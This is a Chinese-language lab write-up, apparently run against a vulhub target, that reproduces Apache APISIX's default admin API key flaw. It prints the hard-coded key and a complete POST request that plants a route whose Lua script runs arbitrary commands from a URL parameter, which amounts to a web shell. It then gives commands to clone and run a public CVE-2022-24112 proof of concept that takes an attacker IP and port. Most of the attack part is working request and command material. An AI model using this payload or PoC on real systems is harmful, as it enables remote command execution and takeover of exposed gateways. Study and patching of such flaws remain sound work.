Apache APISIX 默认密钥漏洞复现

漏洞复现

根据官网源码文件可以看到 Apache APISIX 默认密钥为edd1c9f034335f136f87ad84b625c8f1，在知道管理员密码的情况下我们可以通过构造一个恶意的router，其中包含恶意LUA脚本执行恶意命令

路由创建示例

官方地址：https://apisix.apache.org/zh/docs/apisix/getting-started/
在其 apisix/admin/routes.lua 文件中，使用POST方式提交会将数据消息提交给 check_conf

而 check_conf 中定义了一个 script参数为lua文件类型执行，所以我们只需要将数据包按POST方式提交，并且在消息体中添加含有恶意lua代码的 script 参数

打开vulhub，登录网址 http://靶机IP:8090，发送数据包

POST /apisix/admin/routes HTTP/1.1
Host: 靶机IP:9080
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406

{
    "uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
    "upstream": {
        "type": "roundrobin",
        "nodes": {
            "example.com:80": 1
        }
    }
}

访问 http://靶机IP:9080/attack?cmd=命令 或者curl http://靶机IP:9080/attack?cmd=命令，即可执行对应命令语句

另外可以使用公开的POC进行漏洞利用，输入命令

git clone https://github.com/twseptian/cve-2022-24112
chmod +x cve-2022-24112/poc/poc2.py
python3 cve-2022-24112/poc/poc2.py -t 靶机IP -p 9080 -L 攻击机IP -P 任意端口号